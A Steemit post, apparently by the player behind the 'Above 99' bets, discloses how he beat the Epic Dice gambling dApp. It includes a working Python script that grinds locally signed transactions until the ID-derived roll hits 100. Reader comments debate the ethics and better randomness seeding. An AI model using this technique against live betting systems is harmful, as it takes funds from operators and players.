How 'Above 99' player outplayed Epic Dice

2개월 전

This is direct follow-up and process explanation of Epic Dice shut down, started by @themarkymark at Epic Dice shut down due to witness cheating

image.png
*Decentralization, absolute transparency and fairness are very good ideas. As long as they are done properly.

The problem was with too naive fairness here

Every dice result was calculated by Transaction ID of the bet (payment). @epicdice truly believed it is random. More to read here https://steemit.com/epicdice/@epicdice/epicdice-fairness

In the process of block signing, various information of a particular transaction like ref_block_num, ref_block_prefix, expiration and so on, contributed in the generation of a fully random 40 hex digits trx_id

Random number is generated solely using blockchain-generated transaction ID that is impossible for the house to mess with

They say.

The truth is that Transaction ID is 40 hex string cut from SHA-256 checksum of raw transaction.
Everything what is needed is to prepare custom transaction locally, verify it's 40-cut hash with Epic Dice playcode and broadcast if matches our bet.

Souce code

Steps:

  1. Install python3.6
  2. Install beem library
  3. Run below script (with proper signing keys)
from beem import Steem
from beem.transactionbuilder import TransactionBuilder
from beembase import operations

# EpicDice fairness formula taken from epicdice.io
def playcode(trx_id):
    result = 1000000
    offset = 0
    length = 5
    endValue = offset + length
    chop = ''
    finalResult = ''
    while result > 999999:
        chop = trx_id[offset:endValue]
        offset += 5
        endValue = offset + length
        result = int(chop, 16)
        finalResult = result % (10000) / 100
        finalResult = int(round(finalResult, 0))
        if finalResult == 0:
            result = 1000000
    return finalResult

s = Steem(keys=[ACTIVE_MYS])

# prepare custom transaction
op = operations.Transfer({
    'from': 'mys',
    'to': 'epicdice',
    'amount': "1.020 STEEM",
    'memo': "Above 99"})

# in a loop: sign transaction locally and then
# if transaction id rolls 100, broadcast it to the network
while True:
    tb = TransactionBuilder(steem_instance=s)
    tb.appendOps([op])
    tb.appendWif(ACTIVE_MYS)
    tb.constructTx()
    tx = tb.sign(reconstruct_tx=False)
    
    roll = playcode(tx.id)
    if roll == 100:
        tb.broadcast()

Transaction building and signing takes ~0.5s on average home PC. Assuming we try to hit 100 roll, we should get a match every ~8min. Just broadcast prepared transaction.

image.png
I was able to bet 27 times until @epicdice was taken down for investigation. Received in total 2,698.921 STEEM.

Summarize

  • Nothing was "hacked". @epicdice code had no security nor programming flaw. It is just improper design or unawareness of things.
  • Nothing was "stolen". To be honest, I sent to their wallet 1.020 STEEM and gets back 99.960 STEEM. Who wouldn't repeat this if it works?
  • No witness tool was in use. Yes I do maintain @mysia as a light witness for Steem education purposes. However it wasn't involved in above game.
  • No other accounts beside @mys actored here.

Did I play fairly or cheat shamely? I wonder if there were any other players using same strategy 🤔


EDIT:

image.png

I have returned all of the rewards to be completely fair with the Dice.
Below is their official statement about whole situation:
https://steemit.com/epicdice/@epicdice/epicdice-is-compromised

Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!
STEEMKR.COM IS SPONSORED BY
ADVERTISEMENT
Sort Order:  trending

What is changing in each generated transaction to change the hash? Just a timestamp or also other aspects?

·

What is changing in each generated transaction

To be exact:

  • ref_block_num and ref_block_prefix - they have to match together
  • expiration - this could be arranged between 60 up to 3600 seconds from now. Many combinations we have :)
·
·

Ah, got it. Yes I see those fields in your transactions. Example: 1867dd427abe7a9cfacf9542018832b42c565499.

Would it also be possible to do other operations to grind the hash? I guess that would probably decrease the efficiency of generating the transaction compared to just cycling expiration and ref_block_num/ref_block_prefix.

·
·
·

Ofc we can bet for different amounts of Steem. However cycling expiration date is enough and that I have done in different threads.

Great work on exposing the vulnerability. Really naive to use the transaction ID as the random seed. Amazing that their algorithm didn't use block hash, to at least add an element outside of the signer's control.

However, even when including a block hash, witnesses can game the random seed. This is a worry of mine with @steemmonsters pack opening. I think adding a slow key derivation function like PBKDF2 could result the attack vector by making brute force attempts infeasible. I don't think this has been implemented yet. CC @yabapmatt.

In reality if you wanted to test for a vulnerability, you would do it 3-5 times with success, then let @epicdice know so they could fix it. Anything more is exploiting and just using your "light witness" status to gain for yourself.

The righteous thing would be to keep 500 steem as payment, send the rest back and help them fix it so it is fair.

Posted using Partiko Android

·

Or maybe 2-4 or 4-7? In reality if he wanted to get all the money from epicdice account he would do it with anonymous multi accounts and probably at the time when team is sleeping. He did it from public account and haven't hidden anything. He gave all the STEEM back.

A lot of times when you report bugs you hear "F*ck off", "No, it's not working like that, everything is ok", "Thanks for the help, that's 10 STEEM or X shit tokens as a reward for you".

·
·

He didn't give it back right away though and in hindsight he could've just gone on and on if us players did not catch it. But he could have felt contacting them after my message and others who may have talked to him about it, from knowing it was right and working out the bounty for funds returned etc shows he turned around to be a good guy in the end. But lesson be learned that if you find an exploit and want to help make sure it is fixed, do it 3 - 5 times with success each time, talk to the developers/owners and work something reasonable out.

@mys

  1. It shows you have very deep knowledge of technical things. That's impressive.
  2. It is very sad other's don't have and also think over it.
  3. I think @epicdice was informed at timely otherwise anything can be happens. Thanks for informer and fast action by @epicdice for saving of 13K steem.
  4. If you use your technical knowledge on good things, it will be more better.
  5. I hats off to you to show the mirror to @epicdice.
  6. I have full faith in EPC till now.
    more........ Can not be written or explain.

Finally thanks for all and refunding the all steem

I would definitely not call this "fair", because this is supposed to be gambling, and gambling doesn't involve calculated bets in that fashion, even though almost everyone tries to "beat the house".

You figured out a way to do that, and truth is, that most hackers or "geniuses" in real life would get paid to help preventing these type of things going forward.

Looks to me that you knew that this would work, and instead of telling them about it (so they could fix it), you used it for your own benefit, and probably would have continued to use it if no one found out about it...

Personally, I would have done things differently, but I guess it comes down to the individuals ethics and morals.

That being said, I'm still glad that this stuff happened even though I don't personally like how it happened, as I truly believe that gambling dApps can have a great impact on Steem in general.

Glad how you revealed the detailed steps for the exploit. And the house is surely owe you for the favour in showing how vulnerable is the current randomness mechanism. Thank you.

However IMO it would be much better if you could inform the team about the vulnerability so we can patch it in timely manner, instead of utilise the trick “under the table” until someone else reported the event to the house. This would, unfortunately, making the actor seemingly trying to milk some the house the wrong way.

I’m not sure what is the motto of you running as a witness, but I generally believe a witness is ought to protect and better the whole ecosystem. If you intent to keep the fund, that would sadly cause harm to whole community including the house and players, including you. Things are being torn down instead of constructed.

You’re right, that’s neither stealing nor hacking, it is just unethical to “outplay” the house in such a way that’s clearly not intended by original game design. We would gladly reward you for such a huge bug bounty if you are going to make this a white-hat vulnerability test by returning the fund. You can DM me in here in our Discord for further discussion. Looking forward to you!

·

Dont feed trolls... This is NOT testnetting I mean cmon.

Nothing was "stolen"

Your definition of stolen and everyone else's definition are two different things, it seems.

Who wouldn't repeat this if it works?

We know you would (and did), but not assume that everyone is as dishonest as you have been here.

At the end of the day the facts are these:

  • You exploited a vulnerability in the game for the sole benefit of profit
  • You had no intention to report the vulnerability whatsoever to the @epicdice team proven by your continued use of the exploit until someone else saw what you were doing and raised the alarm
  • You might be blasé about your actions because this is Steem and people seemingly get away with committing indecent acts of fraud and deception here with no recourse, but if you attempted the same thing with a reputable online gambling website, not on the blockchain, you would be facing fraud charges right now
  • This is theft. There is no ethical way you can spin this.
  • Just because you didn't use any witness tool does not excuse the fact you operate a witness node and you acted against the best interests of the Steem blockchain that you are fortunate to represent. Well, were fortunate to represent. Nobody is going to trust you with a witness vote or anything else.

Don't you think Steem has suffered enough at the hands of scammers already? Do we honestly need more bad actors exploiting vulnerabilities instead of reporting them? Keeping this place scam and fraud-free should be the priority.

In every video game, utilizing game mechanics to your advantage beyond their scope is called exploiting and that's what you did. You discovered a flaw in their code/logic and exploited it to your advantage.

Would you have stopped if they hadn't shut down the site? Or would you have drained the whole bank?

There are hard-working people behind @epicdice and what you're doing is sh*tting on their business, because you've outsmarted them.

Take a dive into yourself and think about how you'd feel if you were in their shoes. Would you prefer that someone would tell you about bugs or would you prefer to wake up one morning and have lost thousands of dollars and have your business wrecked?

·

I am glad @mys returned the funds, but really @epicdice's implementation of the random seed was so amateur that they're lucky someone as gracious as @mys was the hacker.

I think this is somewhat of a gray area.

I would review their ToS very closely to make sure you are clear from a legal perspective.

Being that you probably didn't actually have to do anything that would constitute a user agreement, I am not sure if @epicdice would have any recourse.

I know in my line of work, you have to digitally sign documents and that signature if exactly what these businesses and / or entities would use to nail you.

If you intent is to keep the funds (which in my opinion would make you a black hat), then making this post was probably not the best idea as I'm sure it could be used against you.

Even gray hat hacking can be risky. You can have all the good intentions in the world, still get sued and lose. It really depends on the things they have in place.

Many information systems have a warning / login banner for instance which outlines consent to monitor and other things.

Here is an example:

W A R N I N G

This computer system is the property of the University of Tennessee. It is for authorized use only. By using this system, all users acknowledge notice of, and agree to comply with, the University’s Acceptable Use of Information Technology Resources Policy (“AUP”). Click here to read the policy (IT0110). Unauthorized or improper use of this system may result in administrative disciplinary action, civil charges/criminal penalties, and/or other sanctions as set forth in the University’s AUP. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use.

If you are physically located in the European Union, you may have additional rights per the GDPR. Visit the web site dataprivacy.utk.edu for more information.

LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning.


https://security.tennessee.edu/login-banners/

Obviously, being that all one needs to do is send a memo tx to "use" the system. This is a whole different story. Who know? We could be establishing precedents in the not to distant future.

Hope it all works out for all involved.

You definitely didn't play fairly.

And this is in part why https://www.steem-roller.com does not use transaction hashes for it's provably fair engine..

Nothing wrong with having your brain working for you.

·

This comment won for me xD

Posted using Partiko Android

!dramatoken

Worth it! ;-)

·

We need lots of drama tokens :)

Posted using Partiko Android

You can hide my comments your still a sociopathic POS.


You've got DRAMA. You are going to be a Whale!

To view or trade DRAMA go to steem-engine.com.

Good job exposing the weakness.
If you had randomized your bets no telling how long this exploit could've been active.

3k steem = ~600usd?
I wouldn't think the bug bounty would be less than that.
Absent you, this could've been much worse.

Thanks for explaining about this vulnerability to everyone here!
But I wonder how come you lost your first bet? The transaction ID outcome was 89 despite the intended 100! Or was that some error on your part? 😉

You are very extraordinary?

And that's why you add the BlockID as Salt.
Those "hardworking" devs weren't hard working enough.
But yeah, who is testing code?
no one!
HF22 is on its way!

This post has been included in the latest edition of The Steem News - a compilation of the key news stories on the Steem blockchain.

You exploited a flaw...but...I honestly don't know if it was "cheating". You used an awareness of a problem to win. If this were a store where you were buying a product they'd be legally responsible for sending you that product.

I think it might be akin to card counting...which many casinos consider cheating...but I don't. It's basic math. They're just sore when someone's capable of actually winning.

I really dont understanding the programming things, so still i am not sure if the game is reliable for the gamers. You have revealed a vulnerability of the system and now i see you refunded the total amount of steem back to the epicdice account. This is so good and truthful.

However as i understand you can do these things by the advantage of being witness. Now you harm my trust in steem system :) This means "the witness' may bang up any steem user" to me. 🤔


You've got DRAMA. You are going to be a Whale!

To view or trade DRAMA go to steem-engine.com.

Life is about your choices, but reality also includes things you don't do. If you don't help after a car accident and someone bleeds to death, in Germany you go to jail for "failure to provide assistance". You can only bail yourself out with a suitable reason, tell me yours or stay where you are...what would be... I guess a piece of c***?

I think it was just "heart of the dice". Grandpa told me

·

But where is Exodia? :<

Posted using Partiko Android